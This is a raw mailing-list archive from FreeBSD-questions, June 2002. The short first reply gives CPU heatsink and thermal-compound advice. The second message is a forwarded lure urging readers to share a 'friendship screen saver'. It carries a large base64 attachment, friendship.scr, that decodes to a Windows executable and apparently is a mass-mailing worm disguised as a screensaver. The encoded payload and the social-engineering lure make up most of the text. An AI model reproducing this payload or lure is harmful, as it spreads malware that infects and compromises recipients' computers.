(mta02-svc.ntlworld.com [62.253.162.42]) by hub.freebsd.org (Postfix) with ESMTP id BB8C337B400 for ; Tue, 25 Jun 2002 12:49:47 -0700 (PDT) Received: from lungfish.ntlworld.com ([80.4.0.215]) by mta02-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020625194946.CVE4626.mta02-svc.ntlworld.com@lungfish.ntlworld.com>; Tue, 25 Jun 2002 20:49:46 +0100 Received: from tuatara.goatsucker.org (tuatara.goatsucker.org [192.168.1.6]) by lungfish.ntlworld.com (8.11.6/8.11.6) with ESMTP id g5PJnjV00586; Tue, 25 Jun 2002 20:49:45 +0100 (BST) (envelope-from scott@tuatara.goatsucker.org) Received: (from scott@localhost) by tuatara.goatsucker.org (8.12.3/8.12.3/Submit) id g5PJnjbx003329; Tue, 25 Jun 2002 20:49:45 +0100 (BST) (envelope-from scott) Date: Tue, 25 Jun 2002 20:49:44 +0100 From: Scott Mitchell To: Gautham Ganapathy Cc: Jud , "FreeBSD.org - Questions" Subject: Re: [OFF] Pentium vs Athlon which is better Message-ID: <20020625204944.A381@fishballoon.dyndns.org> References: <2WYU5YEDSOS63OKYSZXKIOJ1VXRSPUQ.3d18441e@sparky> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from gauthamg123list@myrealbox.com on Tue, Jun 25, 2002 at 04:26:52PM +0530 X-Operating-System: FreeBSD 4.6-STABLE i386 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 04:26:52PM +0530, Gautham Ganapathy wrote: > On Tuesday, June 25, 2002 3:51 PM, Jud wrote: > > > > After trying several heatsink/fans I've personally settled on > > the Thermal > > Integration TI77N, but there are likely almost as many > > opinions in this > > regard as there are custom built computers with AMD CPUs. The > > maximum temperature I see is around 55-56C. > > It used to be like that before I upgraded my motherboard. However, I did > not change my processor. I think some of the glue b/w the cpu and > heatsink may have come off. think that could be the reason ? It's certainly possible... is this glue some kind of thermal pad that came attached to the heatsink? You probably want to scrape that stuff off (may need a bit of alcohol to dissolve it all, hopefully the heatsink isn't glued permanently to the CPU), get some proper thermal compound (any electronics store should stock this) and apply a *very* thin layer between the heatsink and the CPU. There's plenty of how-to articles on the web that will walk you through the whole process, such as: http://www.arcticsilver.com/arctic_silver_instructions.htm Thermal goo is actually a worse conductor of heat than either the CPU core or the heatsink, but better than air, so the trick is to apply just enough to fill in all the microscopic gaps between the two parts, but no more. 85C is really not a healthy temperature for a CPU... Scott -- =========================================================================== Scott Mitchell | PGP Key ID | "Eagles may soar, but weasels Cambridge, England | 0x54B171B9 | don't get sucked into jet engines" scott.mitchell@mail.com | 0xAA775B8B | -- Anon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:53:52 2002 Delivered-To: freebsd-questions@freebsd.org Received: from eowyn.vianetworks.nl (eowyn.vianetworks.nl [212.61.25.227]) by hub.freebsd.org (Postfix) with ESMTP id 96CF137B41E for ; Tue, 25 Jun 2002 12:51:05 -0700 (PDT) Received: from mail.iaehv.nl (pm17d379.iae.nl [212.61.5.125]) by eowyn.vianetworks.nl (Postfix) with SMTP id B21F420F46 for ; Tue, 25 Jun 2002 21:50:48 +0200 (CEST) From: Edwin Renders To: freebsd-questions@FreeBSD.ORG Subject: Fw: Wonderfool Love to ur friends ! Date: Tue,25 Jun 2002 21:52:35 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=fovcjsf Message-Id: <20020625195048.B21F420F46@eowyn.vianetworks.nl> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --fovcjsf Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable wOW CHECK THIS
Edwin Renders

----- Original Message -----
From: "friendsearch" < passion@friends.com >
To: < erenders@iaehv.nl >
Sent: Tue,25 Jun 2002 21:52:35 PM
Subject: Wonderfool Love to ur friends !


This e-mail is never sent unsolicited. If you need to unsubscribe,
follow the instructions at the bottom of the message.
***********************************************************

Enjoy this friendship Screen Saver and Check ur friends circle...

Send this screensaver from www.friends.com to everyone you
consider a FRIEND, even if it means sending it back to the person
who sent it to you. If it comes back to you, then you'll know you
have a circle of friends.

* To remove yourself from this mailing list, point your browser to:
http://friends.com/remove?freescreensaver
* Enter your email address (erenders@iaehv.nl) in the field provided and click "Unsubscribe".

OR...

* Reply to this message with the word "REMOVE" in the subject line.

This message was sent to address erenders@iaehv.nl
X-PMG-Recipient: erenders@iaehv.nl
<<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>>
--fovcjsf Content-Type: application/octet-stream; name=friendship.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="friendship.scr" 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 